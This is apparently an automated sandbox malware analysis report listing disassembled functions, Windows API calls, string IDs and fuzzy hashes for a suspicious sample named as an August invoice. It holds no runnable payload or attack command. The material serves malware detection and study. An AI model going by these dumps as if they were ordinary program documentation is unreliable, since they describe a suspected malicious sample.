                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: Color$Pixel$Window$Release$ClientLongMessageModeObjectRectSendStockText
                                                          • String ID:
                                                          • API String ID: 1744303182-0
                                                          • Opcode ID: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                                          • Instruction ID: 0380b5c53d8a23173c1b90063483f03488caaf4f58ae5d2001aea5c06c56dff4
                                                          • Opcode Fuzzy Hash: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                                          • Instruction Fuzzy Hash: E6612531140101ABE7109F78CC88BAB7764FB46320F14876AFD659B3D0DBB49C529BAA
                                                          APIs
                                                          • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,004164DE), ref: 00417C28
                                                          • __mtterm.LIBCMT ref: 00417C34
                                                            • Part of subcall function 004178FF: TlsFree.KERNEL32(00000017,00417D96,?,004164DE), ref: 0041792A
                                                            • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000000,00000000,00410E44,?,00417D96,?,004164DE), ref: 004181B8
                                                            • Part of subcall function 004178FF: _free.LIBCMT ref: 004181BB
                                                            • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000017,00410E44,?,00417D96,?,004164DE), ref: 004181E2
                                                          • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00417C4A
                                                          • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00417C57
                                                          • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00417C64
                                                          • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00417C71
                                                          • TlsAlloc.KERNEL32(?,004164DE), ref: 00417CC1
                                                          • TlsSetValue.KERNEL32(00000000,?,004164DE), ref: 00417CDC
                                                          • __init_pointers.LIBCMT ref: 00417CE6
                                                          • __calloc_crt.LIBCMT ref: 00417D54
                                                          • GetCurrentThreadId.KERNEL32 ref: 00417D80
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: AddressProc$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                                          • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                          • API String ID: 4163708885-3819984048
                                                          • Opcode ID: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                                                          • Instruction ID: ca22d9d2e1075830452d52834408fe47c465c3b6ac2468b12672dd77d4d5938c
                                                          • Opcode Fuzzy Hash: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                                                          • Instruction Fuzzy Hash: D5315A75808710DECB10AF75BD0865A3EB8BB60764B12093FE914932B0DB7D8881CF9C
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: __wcsicoll$IconLoad
                                                          • String ID: blank$info$question$stop$warning
                                                          • API String ID: 2485277191-404129466
                                                          • Opcode ID: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                                          • Instruction ID: a4c8356a5cb7371e963c7ba7671977edd7eb5cf64b0a9c0e84f2fcb3e6131cad
                                                          • Opcode Fuzzy Hash: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                                          • Instruction Fuzzy Hash: 9121A732B4021566DB00AB65BC05FEF3358DB98762F040837FA05E2282E3A9A52093BD
                                                          APIs
                                                          • LoadIconW.USER32(?,00000063), ref: 0045464C
                                                          • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0045465E
                                                          • SetWindowTextW.USER32(?,?), ref: 00454678
                                                          • GetDlgItem.USER32(?,000003EA), ref: 00454690
                                                          • SetWindowTextW.USER32(00000000,?), ref: 00454697
                                                          • GetDlgItem.USER32(?,000003E9), ref: 004546A8
                                                          • SetWindowTextW.USER32(00000000,?), ref: 004546AF
                                                          • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 004546D1
                                                          • SendDlgItemMessageW.USER32(?,000003E9,000000C5,?,00000000), ref: 004546EB
                                                          • GetWindowRect.USER32(?,?), ref: 004546F5
                                                          • SetWindowTextW.USER32(?,?), ref: 00454765
                                                          • GetDesktopWindow.USER32 ref: 0045476F
                                                          • GetWindowRect.USER32(00000000), ref: 00454776
                                                          • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004547C4
                                                          • GetClientRect.USER32(?,?), ref: 004547D2
                                                          • PostMessageW.USER32(?,00000005,00000000,00000080), ref: 004547FC
                                                          • SetTimer.USER32(?,0000040A,?,00000000), ref: 0045483F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                          • String ID:
                                                          • API String ID: 3869813825-0
                                                          • Opcode ID: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                                                          • Instruction ID: 23cbb84c7db07f79204f7fb68ef1a354279dd66d41dce19f663d7a5246859b32
                                                          • Opcode Fuzzy Hash: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                                                          • Instruction Fuzzy Hash: 06619D75A00705ABD720DFA8CE89F6FB7F8AB48705F00491DEA46A7290D778E944CB54
                                                          APIs
                                                          • _wcslen.LIBCMT ref: 00464B28
                                                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B38
                                                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B60
                                                          • _wcslen.LIBCMT ref: 00464C28
                                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000,?), ref: 00464C3C
                                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00464C64
                                                          • _wcslen.LIBCMT ref: 00464CBA
                                                          • _wcslen.LIBCMT ref: 00464CD0
                                                          • _wcslen.LIBCMT ref: 00464CEF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: _wcslen$Directory$CurrentSystem
                                                          • String ID: D
                                                          • API String ID: 1914653954-2746444292
                                                          • Opcode ID: 44be7054643fd4ba856d6b2e359bfbfbb3de9f7e14d5395c76b411fe07bee919
                                                          • Instruction ID: cb0983c86ca1fa87ccea60adda1cf5635047c5df12380c224dcb23d097980814
                                                          • Opcode Fuzzy Hash: 44be7054643fd4ba856d6b2e359bfbfbb3de9f7e14d5395c76b411fe07bee919
                                                          • Instruction Fuzzy Hash: 98E101716043409BD710EF65C845B6BB7E4AFC4308F148D2EF98987392EB39E945CB9A
                                                          APIs
                                                          • _wcsncpy.LIBCMT ref: 0045CE39
                                                          • __wsplitpath.LIBCMT ref: 0045CE78
                                                          • _wcscat.LIBCMT ref: 0045CE8B
                                                          • _wcscat.LIBCMT ref: 0045CE9E
                                                          • GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEB2
                                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEC5
                                                            • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                          • GetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF05
                                                          • SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF1D
                                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF2E
                                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF3F
                                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF53
                                                          • _wcscpy.LIBCMT ref: 0045CF61
                                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CFA4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: CurrentDirectory$AttributesFile$_wcscat$__wsplitpath_wcscpy_wcsncpy
                                                          • String ID: *.*
                                                          • API String ID: 1153243558-438819550
                                                          • Opcode ID: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
                                                          • Instruction ID: eacc2f87ca0c49a88fd160cf35c0ab61f7b8ac52d7ffc0430f804bda47b2a69a
                                                          • Opcode Fuzzy Hash: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
                                                          • Instruction Fuzzy Hash: F071D572900208AEDB24DB54CCC5AEEB7B5AB44305F1489ABE805D7242D67C9ECDCB99
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: __wcsicoll
                                                          • String ID: LEFT$MAIN$MENU$MIDDLE$PRIMARY$RIGHT$SECONDARY
                                                          • API String ID: 3832890014-4202584635
                                                          • Opcode ID: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                                                          • Instruction ID: 3b59ed03df0c76d23b576b9f0bbd6b5c96606bf3e4c0b80e5c93e428ec3f30be
                                                          • Opcode Fuzzy Hash: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                                                          • Instruction Fuzzy Hash: AB117772A4422512E91072657C03BFF219CCF1177AF14487BF90DE5A82FB4EDA9541ED
                                                          APIs
                                                          • PostMessageW.USER32(?,00000112,0000F060,00000000), ref: 0046A0C9
                                                          • GetFocus.USER32 ref: 0046A0DD
                                                          • GetDlgCtrlID.USER32(00000000), ref: 0046A0E8
                                                          • PostMessageW.USER32(?,00000111,?,00000000), ref: 0046A13C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: MessagePost$CtrlFocus
                                                          • String ID: 0
                                                          • API String ID: 1534620443-4108050209
                                                          • Opcode ID: d1db05db4fd2a56646a253bb82972057caa917eb73d061b61dca20a17b51d953
                                                          • Instruction ID: bf3f5449e9a8ba554bb586fd0597798874618ae7c394ba8af81d11134a55f14d
                                                          • Opcode Fuzzy Hash: d1db05db4fd2a56646a253bb82972057caa917eb73d061b61dca20a17b51d953
                                                          • Instruction Fuzzy Hash: 9791AD71604711AFE710CF14D884BABB7A4FB85314F004A1EF991A7381E7B9D895CBAB
                                                          APIs
                                                          • DestroyWindow.USER32(?), ref: 004558E3
                                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 0045592C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: Window$CreateDestroy
                                                          • String ID: ,$tooltips_class32
                                                          • API String ID: 1109047481-3856767331
                                                          • Opcode ID: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                                                          • Instruction ID: 3e2a402d8ef05c983ab6a33f0f0d51d253aadf8c8a2d9d50fdabec1795fb524a
                                                          • Opcode Fuzzy Hash: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                                                          • Instruction Fuzzy Hash: AE71AD71650208AFE720CF58DC84FBA77B8FB59310F20851AFD45AB391DA74AD46CB98
                                                          APIs
                                                          • GetMenuItemInfoW.USER32(?,00000007,00000000,00000030), ref: 00468BB1
                                                          • GetMenuItemCount.USER32(?), ref: 00468C45
                                                          • DeleteMenu.USER32(?,00000005,00000000,?,?,?), ref: 00468CD9
                                                          • DeleteMenu.USER32(?,00000004,00000000,?,?), ref: 00468CE2
                                                          • DeleteMenu.USER32(00000000,00000006,00000000,?,00000004,00000000,?,?), ref: 00468CEB
                                                          • DeleteMenu.USER32(?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468CF4
                                                          • GetMenuItemCount.USER32 ref: 00468CFD
                                                          • SetMenuItemInfoW.USER32(?,00000004,00000000,00000030), ref: 00468D35
                                                          • GetCursorPos.USER32(?), ref: 00468D3F
                                                          • SetForegroundWindow.USER32(?), ref: 00468D49
                                                          • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468D5F
                                                          • PostMessageW.USER32(?,00000000,00000000,00000000), ref: 00468D6C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow
                                                          • String ID: 0
                                                          • API String ID: 1441871840-4108050209
                                                          • Opcode ID: 12c28d3332ad221b92e3a636ba418a85e822d4b5186b1920d2f56c44304fb3db
                                                          • Instruction ID: 6d2915cdebcc0779354c8c01805c07fba6dcd836026253be2713676dcba25ca6
                                                          • Opcode Fuzzy Hash: 12c28d3332ad221b92e3a636ba418a85e822d4b5186b1920d2f56c44304fb3db
                                                          • Instruction Fuzzy Hash: F571A0B0644300BBE720DB58CC45F5AB7A4AF85724F20470EF5656B3D1DBB8B8448B2A
                                                          APIs
                                                          • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                                                          • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                                                          • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                                                          • __swprintf.LIBCMT ref: 00460915
                                                          • __swprintf.LIBCMT ref: 0046092D
                                                          • _wprintf.LIBCMT ref: 004609E1
                                                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004609FA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: HandleLoadModuleString__swprintf$Message_memmove_wcslen_wprintf
                                                          • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                          • API String ID: 3631882475-2268648507
                                                          • Opcode ID: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                                                          • Instruction ID: 03c51728676f919c2e33c8c13cfd5c1cee97c3d48cab2dbcdd3400b30208eb52
                                                          • Opcode Fuzzy Hash: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                                                          • Instruction Fuzzy Hash: F5416071900209ABDB00FB91CD46AEF7778AF44314F44447AF50577192EA786E45CBA9
                                                          APIs
                                                          • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004716C7
                                                          • ExtractIconExW.SHELL32(?,000000FF,?,?,00000001), ref: 004716E1
                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00471711
                                                          • SendMessageW.USER32 ref: 00471740
                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,?,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 00471779
                                                          • SendMessageW.USER32(?,00001003,00000001,00000000), ref: 0047179A
                                                          • ImageList_Create.COMCTL32(00000020,00000020,00000021,00000000,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 004717B0
                                                          • SendMessageW.USER32(?,00001003,00000000,00000000), ref: 004717D3
                                                          • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004717F8
                                                          • ImageList_ReplaceIcon.COMCTL32(00000000,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 00471807
                                                          • SendMessageW.USER32 ref: 0047184F
                                                          • SendMessageW.USER32(?,0000104C,00000000,00000002), ref: 00471872
                                                          • SendMessageW.USER32(?,00001015,00000000,00000000), ref: 00471890
                                                          • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 0047189C
                                                          • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004718A2
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Icon$ImageList_$CreateDestroyExtractReplace
                                                          • String ID:
                                                          • API String ID: 4116747274-0
                                                          • Opcode ID: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                                                          • Instruction ID: aa77b4eb3e0d334a4980849760fe45b072e458157f6a66894e70986bfe60c355
                                                          • Opcode Fuzzy Hash: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                                                          • Instruction Fuzzy Hash: 39617D75A00209AFEB10DF68CD85FEEB7B4FB48710F10855AF618AB2D0D7B4A981CB54
                                                          APIs
                                                          • GetClassNameW.USER32(?,?,00000100), ref: 00461678
                                                          • _wcslen.LIBCMT ref: 00461683
                                                          • __swprintf.LIBCMT ref: 00461721
                                                          • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00461794
                                                          • GetClassNameW.USER32(?,?,00000400), ref: 00461811
                                                          • GetDlgCtrlID.USER32(?), ref: 00461869
                                                          • GetWindowRect.USER32(?,?), ref: 004618A4
                                                          • GetParent.USER32(?), ref: 004618C3
                                                          • ScreenToClient.USER32(00000000), ref: 004618CA
                                                          • GetClassNameW.USER32(?,?,00000100), ref: 00461941
                                                          • GetWindowTextW.USER32(?,?,00000400), ref: 0046197E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
